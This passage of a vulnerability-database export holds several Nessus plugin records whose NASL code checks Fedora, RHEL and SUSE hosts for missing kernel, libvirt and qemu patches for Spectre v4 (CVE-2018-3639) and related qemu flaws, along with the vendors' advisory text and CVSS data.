make_list(\"CVE-2018-3639\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2018-db0d3e157e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"kernel-4.16.11-300.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, 
"vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T02:30:39", "bulletinFamily": "scanner", "description": "Add new CPU features for speculative store bypass (CVE-2018-3639)\n\nOn Intel x86 hosts, the ", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-527698A904.NASL", "href": "https://www.tenable.com/plugins/nessus/120426", "published": "2019-01-03T00:00:00", "title": "Fedora 28 : libvirt (2018-527698a904) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-527698a904.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120426);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/23 11:21:06\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"FEDORA\", value:\"2018-527698a904\");\n\n script_name(english:\"Fedora 28 : libvirt (2018-527698a904) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add new CPU features for speculative store bypass (CVE-2018-3639)\n\nOn Intel x86 hosts, the 'ssbd' feature must be explicitly added to any\nvirtual machines that are not using host-passthrough/host-model CPU\nsetup. NB this requires new microcode too, which is not yet available\nin Fedora microcode_ctl RPMs.\n\nOn AMD x86 hosts, the 'virt-ssbd' feature must be explicitly added to\nany virtual machines that are not using host-passthrough/host-model\nCPU setup. 
There is no microcode dependency for AMD as this is a\nvirtualized CPUID feature.\n\nIn both cases, kernel >= 4.16.10-301 is required on the host and guest\nin order to activate the fix.\n\nQEMU >= qemu-2.11.1-3.fc28 is also required on the host\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-527698a904\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvirt package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libvirt-4.1.0-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T03:25:27", "bulletinFamily": "scanner", "description": "An update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco\nExtended Update Support, and Red Hat Enterprise Linux 7.2 Update\nServices for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2018-3423.NASL", "href": "https://www.tenable.com/plugins/nessus/118558", "published": "2018-10-31T00:00:00", "title": "RHEL 7 : qemu-kvm (RHSA-2018:3423) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3423. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118558);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:3423\");\n\n script_name(english:\"RHEL 7 : qemu-kvm (RHSA-2018:3423) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco\nExtended Update Support, and Red Hat Enterprise Linux 7.2 Update\nServices for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). 
As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libcacard\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libcacard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libcacard-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3423\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"i686\", reference:\"libcacard-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"libcacard-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"i686\", reference:\"libcacard-devel-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"libcacard-devel-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"libcacard-tools-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-img-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-common-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"i686\", reference:\"qemu-kvm-debuginfo-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", 
cpu:\"x86_64\", reference:\"qemu-kvm-debuginfo-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-1.5.3-105.el7_2.18\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libcacard / libcacard-devel / libcacard-tools / qemu-img / qemu-kvm / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T03:25:16", "bulletinFamily": "scanner", "description": "An update for qemu-kvm is now available for Red Hat Enterprise Linux\n6.4 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). 
It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2018-3401.NASL", "href": "https://www.tenable.com/plugins/nessus/118550", "published": "2018-10-31T00:00:00", "title": "RHEL 6 : qemu-kvm (RHSA-2018:3401) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3401. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118550);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:3401\");\n\n script_name(english:\"RHEL 6 : qemu-kvm (RHSA-2018:3401) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for qemu-kvm is now available for Red Hat Enterprise Linux\n6.4 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. 
The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-guest-agent-win32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.4\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3401\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-guest-agent-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", 
reference:\"qemu-guest-agent-win32-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-img-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-debuginfo-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-0.12.1.2-2.355.el6_4.12\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu-guest-agent / qemu-guest-agent-win32 / qemu-img / qemu-kvm / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:23:57", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following issues :\n\nThese security issues were fixed :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735).\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223).\n\nWith this release the mitigations for Spectre v4 are moved to the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nThis feature was added: Add support for block resize support for disks\nthrough the monitor (bsc#1094725).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-3555-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118502", "published": "2018-10-30T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : qemu (SUSE-SU-2018:3555-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3555-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118502);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : qemu (SUSE-SU-2018:3555-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following issues :\n\nThese security issues were fixed :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735).\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223).\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nThis feature was added: Add support for block resize support for disks\nthrough the monitor (bsc#1094725).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the 
SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1094725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1098735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11806/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12617/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183555-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?164cf97f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-2519=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2519=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nSUSE CaaS Platform 3.0 :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. 
